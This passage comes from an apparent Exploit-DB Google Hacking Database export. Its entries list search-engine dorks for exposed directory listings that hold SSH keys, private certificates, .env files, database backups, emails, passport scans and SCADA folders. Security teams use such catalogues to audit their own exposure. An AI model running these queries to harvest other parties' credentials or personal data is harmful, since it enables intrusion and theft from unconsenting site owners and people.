<textualDescription>Exploit : Dorks allow you to access the sensitive directories of any web
application using Apache Tomcat/5.0.28.
Google Dork : intitle:&quot;Directory Listing For&quot; &quot;Filename&quot;
intext:Tomcat/5.0.28
Exploit Author:- Jayson Zabate
URL :- https://invalidwebsecurity.info/
</textualDescription>
<query>intitle:&quot;Directory Listing For&quot; &quot;Filename&quot; intext:Tomcat/5.0.28</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Directory Listing For&quot; &quot;Filename&quot; intext:Tomcat/5.0.28</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>Jayson Zabate</author>
</entry>
<entry>
<id>589</id>
<link>https://www.exploit-db.com/ghdb/589</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Directory Listing For&quot; intext:Tomcat -intitle:Tomcat</shortDescription>
<textualDescription>The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using &quot;index.of&quot;.</textualDescription>
<query>intitle:&quot;Directory Listing For&quot; intext:Tomcat -int</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Directory+Listing+For%22+intext%3ATomcat+-intitle%3ATomcat</querystring>
<edb></edb>
<date>2004-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5000</id>
<link>https://www.exploit-db.com/ghdb/5000</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;docker&quot; intitle:&quot;index of&quot; config</shortDescription>
<textualDescription>*Google Dork:- **intitle:&quot;docker&quot; intitle:&quot;index of&quot; config*
*Description :- *
*Discovers Docker config files and open directories of Sites.*
*Docker Sensitive Directories Expose on Site**.*
*Date :- 28th Oct, 2018*
*Exploit Author :- Aman Bhardwaj *
</textualDescription>
<query>intitle:&quot;docker&quot; intitle:&quot;index of&quot; config</query>
<querystring>https://www.google.com/search?q=intitle:&quot;docker&quot; intitle:&quot;index of&quot; config</querystring>
<edb></edb>
<date>2018-10-29</date>
<author>Aman Bhardwaj</author>
</entry>
<entry>
<id>6579</id>
<link>https://www.exploit-db.com/ghdb/6579</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Everything&quot; inurl:C:\Windows</shortDescription>
<textualDescription># Dork: intitle:&quot;Everything&quot; inurl:C:\Windows
# Sensitive directories</textualDescription>
<query>intitle:&quot;Everything&quot; inurl:C:Windows</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Everything&quot; inurl:C:\Windows</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Manh Tuong Vi</author>
</entry>
<entry>
<id>1148</id>
<link>https://www.exploit-db.com/ghdb/1148</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Folder Listing&quot; &quot;Folder Listing&quot; Name Size Date/Time File Folder</shortDescription>
<textualDescription>directory listing for Fastream NETFile Web Server</textualDescription>
<query>intitle:&quot;Folder Listing&quot; &quot;Folder Listing&quot; Name Size Date/Time File Folder</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Folder+Listing%22+%22Folder+Listing%22+Name+Size+Date%2FTime+File+Folder</querystring>
<edb></edb>
<date>2005-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>804</id>
<link>https://www.exploit-db.com/ghdb/804</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;HFS /&quot; +&quot;HttpFileServer&quot;</shortDescription>
<textualDescription>&quot;The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well.&quot; http://johnny.ihackstuff.com/index.php?name=PNphpBB2&amp;file=viewtopic&amp;t=1516</textualDescription>
<query>intitle:&quot;HFS /&quot; +&quot;HttpFileServer&quot;</query>
<querystring>https://www.google.com/search?hl=de&amp;q=intitle%3A%22HFS+%2F%22+%2B%22HttpFileServer%22&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2005-01-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>467</id>
<link>https://www.exploit-db.com/ghdb/467</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of *&quot; inurl:&quot;my shared folder&quot; size modified</shortDescription>
<textualDescription>These are index pages of &quot;My Shared Folder&quot;. Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue.</textualDescription>
<query>intitle:&quot;Index of *&quot; inurl:&quot;my shared folder&quot; size modified</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22Index+of+*%22+inurl%3A%22my+shared+folder%22+size+modified</querystring>
<edb></edb>
<date>2004-09-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4537</id>
<link>https://www.exploit-db.com/ghdb/4537</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of /&quot; &quot;joomla_update.php&quot;</shortDescription>
<textualDescription>Finds directories with Joomla logs, often containing juicy info
Dxtroyer</textualDescription>
<query>intitle:&quot;Index of /&quot; &quot;joomla_update.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; &quot;joomla_update.php&quot;</querystring>
<edb></edb>
<date>2017-06-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7856</id>
<link>https://www.exploit-db.com/ghdb/7856</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; &quot;sqlite.db&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of /&quot; &quot;sqlite.db&quot;
# Sensitive Directories
# Date: 02/12/2021
# Exploit Author: Luc Moreau</textualDescription>
<query>intitle:&quot;index of /&quot; &quot;sqlite.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; &quot;sqlite.db&quot;</querystring>
<edb></edb>
<date>2022-06-15</date>
<author>Luc Moreau</author>
</entry>
<entry>
<id>6392</id>
<link>https://www.exploit-db.com/ghdb/6392</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of /&quot; +.htaccess.old</shortDescription>
<textualDescription>Description: intitle:&quot;Index of /&quot; +.htaccess.old
Access to the parent directory and more
</textualDescription>
<query>intitle:&quot;Index of /&quot; +.htaccess.old</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; +.htaccess.old</querystring>
<edb></edb>
<date>2020-07-13</date>
<author>vineet patil</author>
</entry>
<entry>
<id>5031</id>
<link>https://www.exploit-db.com/ghdb/5031</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; authorized_keys</shortDescription>
<textualDescription>Google Dork Description: intitle:&quot;index of /&quot; authorized_keys
Google Search: intitle:&quot;index of /&quot; authorized_keys
Author: @nuria_pp
Sensitive Directories: authorized_keys ssh and some rsa file</textualDescription>
<query>intitle:&quot;index of /&quot; authorized_keys</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; authorized_keys</querystring>
<edb></edb>
<date>2018-11-16</date>
<author>nuria_pp</author>
</entry>
<entry>
<id>5039</id>
<link>https://www.exploit-db.com/ghdb/5039</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; intext:/backup</shortDescription>
<textualDescription>Access to different backup files
Author: Mattias Borg
</textualDescription>
<query>intitle:&quot;index of /&quot; intext:/backup</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; intext:/backup</querystring>
<edb></edb>
<date>2018-11-27</date>
<author>Mattias Borg</author>
</entry>
<entry>
<id>5025</id>
<link>https://www.exploit-db.com/ghdb/5025</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; intext:/descargas/</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of /&quot; intext:/descargas/
author: @nuria_pp
</textualDescription>
<query>intitle:&quot;index of /&quot; intext:/descargas/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; intext:/descargas/</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>nuria_pp</author>
</entry>
<entry>
<id>5026</id>
<link>https://www.exploit-db.com/ghdb/5026</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; intext:/Download/</shortDescription>
<textualDescription>Google Dork: intitle:&quot;index of /&quot; intext:/Download/
author: @nuria_pp
</textualDescription>
<query>intitle:&quot;index of /&quot; intext:/Download/</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; intext:/Download/</querystring>
<edb></edb>
<date>2018-11-14</date>
<author>nuria_pp</author>
</entry>
<entry>
<id>5075</id>
<link>https://www.exploit-db.com/ghdb/5075</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of /&quot; inurl:passport</shortDescription>
<textualDescription>intitle:”Index of /“ inurl:passport
Find a lot of passports
</textualDescription>
<query>intitle:&quot;Index of /&quot; inurl:passport</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; inurl:passport</querystring>
<edb></edb>
<date>2019-01-14</date>
<author>Bl4kd43m0n</author>
</entry>
<entry>
<id>5084</id>
<link>https://www.exploit-db.com/ghdb/5084</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /&quot; ssh</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ All sorts of Websites (a lot of colleges) ++
intitle:&quot;index of /&quot; ssh
Data you find:
- Webserver Version
- SSH Version
- SSH Keys
- SSH Logins
- SSH .exe files
I found a lot of servers using &lt; SSH 1.4.*
These are usually +5 years old and full of security holes
A search in Exploit DB for SSH 1. turns up +40.000 exploits for these
some may work.
++ 55 500 results at the time of writing ++
DISCLAIMER:
The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system.
</textualDescription>
<query>intitle:&quot;index of /&quot; ssh</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /&quot; ssh</querystring>
<edb></edb>
<date>2019-01-25</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4854</id>
<link>https://www.exploit-db.com/ghdb/4854</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of /bins&quot; arm</shortDescription>
<textualDescription>Description: Find servers infected with mirai
Author: edm0nd
</textualDescription>
<query>intitle:&quot;index of /bins&quot; arm</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of /bins&quot; arm</querystring>
<edb></edb>
<date>2018-06-13</date>
<author>edm0nd</author>
</entry>
<entry>
<id>782</id>
<link>https://www.exploit-db.com/ghdb/782</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of /CFIDE/&quot; administrator</shortDescription>
<textualDescription>With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen</textualDescription>
<query>intitle:&quot;Index of /CFIDE/&quot; administrator</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of+%2FCFIDE%2F%22+administrator</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5050</id>
<link>https://www.exploit-db.com/ghdb/5050</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of /private/&quot;</shortDescription>
<textualDescription>Search Private directories also work on Yahoo
Google Dorks: *intitle:&quot;Index of /private/&quot;*
Author: Rishabh Sharma (Lazy Hacker)
</textualDescription>
<query>intitle:&quot;Index of /private/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /private/&quot;</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>Lazy Hacker</author>
</entry>
<entry>
<id>134</id>
<link>https://www.exploit-db.com/ghdb/134</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of c:\Windows&quot;</shortDescription>
<textualDescription>These pages indicate that they are sharing the C:\WINDOWS directory, which is the system folder for many Windows installations.</textualDescription>
<query>intitle:&quot;Index of c:\Windows&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22Index+of+c%3A%5CWindows%22</querystring>
<edb></edb>
<date>2004-02-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>6367</id>
<link>https://www.exploit-db.com/ghdb/6367</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of c:\xampp&quot;</shortDescription>
<textualDescription>intitle:&quot;Index of c:\xampp&quot;
Category: Sensitive Directory
Summary: A Google dork that gives information about the Sensitive Directory.
</textualDescription>
<query>intitle:&quot;Index of c:xampp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of c:\xampp&quot;</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Prasad Lingamaiah</author>
</entry>
<entry>
<id>4007</id>
<link>https://www.exploit-db.com/ghdb/4007</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;Index of ftp&quot;</shortDescription>
<textualDescription>This dork finds open ftps. This is a base dork, where you can add
intext:&quot;ssh/&quot; for folder search and intext:&quot;-2015&quot; for dates and years.
Author:NickiK.</textualDescription>
<query>intitle:&quot;Index of ftp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of ftp&quot;</querystring>
<edb></edb>
<date>2015-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7384</id>
<link>https://www.exploit-db.com/ghdb/7384</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of SCADA&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of SCADA&quot;
# Sensitive Directories
# Date: 01/10/2021
# Exploit Author: Romell Marin Cordoba</textualDescription>
<query>intitle:&quot;index of SCADA&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of SCADA&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Romell Marin Cordoba</author>
</entry>
<entry>
<id>6672</id>
<link>https://www.exploit-db.com/ghdb/6672</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*.cert.pem&quot; | &quot;*.key.pem&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*.cert.pem&quot; | &quot;*.key.pem&quot;
# Sensitive directories containing Private Keys and more...
# Date: 9/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*.cert.pem&quot; | &quot;*.key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*.cert.pem&quot; | &quot;*.key.pem&quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6732</id>
<link>https://www.exploit-db.com/ghdb/6732</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*Maildir/new&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;*Maildir/new&quot;
# Sensitive directories where many email directories and emails can be found...
# Date: 16/12/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*Maildir/new&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*Maildir/new&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5749</id>
<link>https://www.exploit-db.com/ghdb/5749</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;*php.swp&quot;</shortDescription>
<textualDescription>Find swp files left over by vim and other text editors, to allow for php
source code disclosure.
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;*php.swp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;*php.swp&quot;</querystring>
<edb></edb>
<date>2020-02-21</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5165</id>
<link>https://www.exploit-db.com/ghdb/5165</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.cpanel/caches/config/&quot;</shortDescription>
<textualDescription>Search: Cpanel Caches Config Directory Listing
Google Dorks: intitle:&quot;index of&quot; &quot;.cpanel/caches/config/&quot;
Category : Sensitive Directories
Exploit Authors:- Om Ahuja
Jayesh Thakur
Mukul Kulshrestha
Harsh Mukeshbhai Joshi
Sagar Shetty
https://www.inspiraenterprise.com/
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.cpanel/caches/config/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.cpanel/caches/config/&quot;</querystring>
<edb></edb>
<date>2019-04-03</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>5138</id>
<link>https://www.exploit-db.com/ghdb/5138</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.dockerignore&quot;</shortDescription>
<textualDescription> Exploit : Access the Sensitive Directories using .dockerignore file
Google Dork : intitle:&quot;index of&quot; &quot;.dockerignore&quot;
Exploit Author:- Inspira Enterprise Pvt Ltd
URL :- https://www.inspiraenterprise.com
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.dockerignore&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.dockerignore&quot;</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>7533</id>
<link>https://www.exploit-db.com/ghdb/7533</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.env&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;.env&quot;
# Sensitive Directories
# Date: 29/10/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.env&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.env&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>5133</id>
<link>https://www.exploit-db.com/ghdb/5133</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;.pem&quot;</shortDescription>
<textualDescription> Exploit : Access the .pem (Privacy Enhanced Mail) file
Google Dork : intitle:&quot;index of&quot; &quot;.pem&quot;
Exploit Author:- Inspira Enterprise Pvt Ltd
URL :- https://www.inspiraenterprise.com</textualDescription>
<query>intitle:&quot;index of&quot; &quot;.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;.pem&quot;</querystring>
<edb></edb>
<date>2019-02-22</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>6958</id>
<link>https://www.exploit-db.com/ghdb/6958</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/.vscode&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;index of&quot; &quot;/.vscode&quot;
# Finding directories with sensitive information
--
Regards,
*Hilary Soita.*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/.vscode&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/.vscode&quot;</querystring>
<edb></edb>
<date>2021-05-25</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>6463</id>
<link>https://www.exploit-db.com/ghdb/6463</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/000~ROOT~000/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/000~ROOT~000/&quot;
# Juicy and sensitive information under Root directory.
# Date: 29/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/000~ROOT~000/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/000~ROOT~000/&quot;</querystring>
<edb></edb>
<date>2020-08-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6014</id>
<link>https://www.exploit-db.com/ghdb/6014</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/admin/backup&quot;</shortDescription>
<textualDescription>Path to admin backup file using
intitle:&quot;index of&quot; &quot;/admin/backup&quot;
-Juveria Banu
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/admin/backup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/admin/backup&quot;</querystring>
<edb></edb>
<date>2020-05-05</date>
<author>Juveria Banu</author>
</entry>
<entry>
<id>5982</id>
<link>https://www.exploit-db.com/ghdb/5982</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/admin_backup&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/admin_backup&quot;
This Google dork shows juicy information about the website and some
sensitive directories.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 30 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/admin_backup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/admin_backup&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>6567</id>
<link>https://www.exploit-db.com/ghdb/6567</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/app.log&quot; | &quot;/app.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/app.log&quot; | &quot;/app.logs&quot;
# Sensitive Directories.
# Date: 24/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/app.log&quot; | &quot;/app.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/app.log&quot; | &quot;/app.logs&quot;</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5139</id>
<link>https://www.exploit-db.com/ghdb/5139</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/aws.s3/&quot;</shortDescription>
<textualDescription>Exploit : Access the Sensitive Directories of Amazon-Web-Services
Google Dork : intitle:&quot;index of&quot; &quot;/aws.s3/&quot;
Exploit Author:- Inspira Enterprise Pvt Ltd
URL :- https://www.inspiraenterprise.com</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/aws.s3/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/aws.s3/&quot;</querystring>
<edb></edb>
<date>2019-03-01</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>5132</id>
<link>https://www.exploit-db.com/ghdb/5132</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/bitcoin/&quot;</shortDescription>
<textualDescription>Exploit : Access the Sensitive Directories using bitcoin directories
Google Dork : intitle:&quot;index of&quot; &quot;/bitcoin/&quot;
Exploit Author:- Inspira Enterprise Pvt Ltd
URL :- https://www.inspiraenterprise.com
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/bitcoin/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/bitcoin/&quot;</querystring>
<edb></edb>
<date>2019-02-22</date>
<author>Inspira Enterprise Pvt Ltd</author>
</entry>
<entry>
<id>6599</id>
<link>https://www.exploit-db.com/ghdb/6599</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/CFIDE/&quot; intext:&quot;administrator&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/CFIDE/&quot; intext:&quot;administrator&quot;
# Sensitive directories.
# Date: 8/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/CFIDE/&quot; intext:&quot;administrator&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/CFIDE/&quot; intext:&quot;administrator&quot;</querystring>
<edb></edb>
<date>2020-10-08</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5720</id>
<link>https://www.exploit-db.com/ghdb/5720</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/Cloudflare-CPanel-7.0.1&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;/Cloudflare-CPanel-7.0.1&quot;
Author: Pankaj Kumar Thakur (Nepal)
Linkedin: https://www.linkedin.com/in/pankaj1261/
Twitter: @Nep_1337_1998
Info:
It expose Cloudflare-Cpanel sensitive files
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/Cloudflare-CPanel-7.0.1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/Cloudflare-CPanel-7.0.1&quot;</querystring>
<edb></edb>
<date>2020-01-29</date>
<author>Pankaj Kumar Thakur</author>
</entry>
<entry>
<id>5800</id>
<link>https://www.exploit-db.com/ghdb/5800</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/concrete/Authentication&quot;</shortDescription>
<textualDescription>Google Dork Query to find out insecure and sensitve concrete Authentication
stored in YML format.
Google Dork Query: *intitle:&quot;index of&quot; &quot;/concrete/Authentication&quot;*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/concrete/Authentication&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/concrete/Authentication&quot;</querystring>
<edb></edb>
<date>2020-03-17</date>
<author>Rohit Gautam</author>
</entry>
<entry>
<id>7014</id>
<link>https://www.exploit-db.com/ghdb/7014</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/configs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/configs&quot;
# Sensitive directories containing many times usernames, passwords and
other juicy information like emails, IPs, hostnames and more...
# Date: 29/06/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/configs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/configs&quot;</querystring>
<edb></edb>
<date>2021-07-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5958</id>
<link>https://www.exploit-db.com/ghdb/5958</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/db_backups/&quot;</shortDescription>
<textualDescription>#Description: intitle:&quot;index of&quot; &quot;/db_backups/&quot;
This Google dork shows juicy information about the website and finds out
database backup files with publicly available database directories.
An attacker can further misuse this to conduct attacks.
#Author : Tushar Kurunkar
#Date : 28 April 2020
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/db_backups/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/db_backups/&quot;</querystring>
<edb></edb>
<date>2020-04-28</date>
<author>Tushar Kurunkar</author>
</entry>
<entry>
<id>5585</id>
<link>https://www.exploit-db.com/ghdb/5585</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/etc/mysql/&quot;</shortDescription>
<textualDescription>Sensitive directories and files:
intitle:&quot;index of&quot; &quot;/etc/mysql/&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/etc/mysql/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/etc/mysql/&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6357</id>
<link>https://www.exploit-db.com/ghdb/6357</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/home/ROOT_PATH/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/home/ROOT_PATH/&quot;
# Sensitive directories.
# Date: 29/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/home/ROOT_PATH/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/home/ROOT_PATH/&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6382</id>
<link>https://www.exploit-db.com/ghdb/6382</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/root/etc/security/&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/root/etc/security/&quot;
# Juicy information and sensitive directories.
# Date: 8/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/root/etc/security/&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/root/etc/security/&quot;</querystring>
<edb></edb>
<date>2020-07-08</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6590</id>
<link>https://www.exploit-db.com/ghdb/6590</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/system.log&quot; | &quot;/system.logs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;/system.log&quot; | &quot;/system.logs&quot;
# Sensitive directories with juicy info.
# Date: 2/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;/system.log&quot; | &quot;/system.logs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;/system.log&quot; | &quot;/system.logs&quot;</querystring>
<edb></edb>
<date>2020-10-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5102</id>
<link>https://www.exploit-db.com/ghdb/5102</link>
<category>Sensitive Directories</category>
<shortDescription>intitle:&quot;index of&quot; &quot;/user&quot; | &quot;/users&quot;</shortDescription>
<textualDescription>This will show existing users in the system by simply going to the above
mentioned directories.
Bruno Schmid
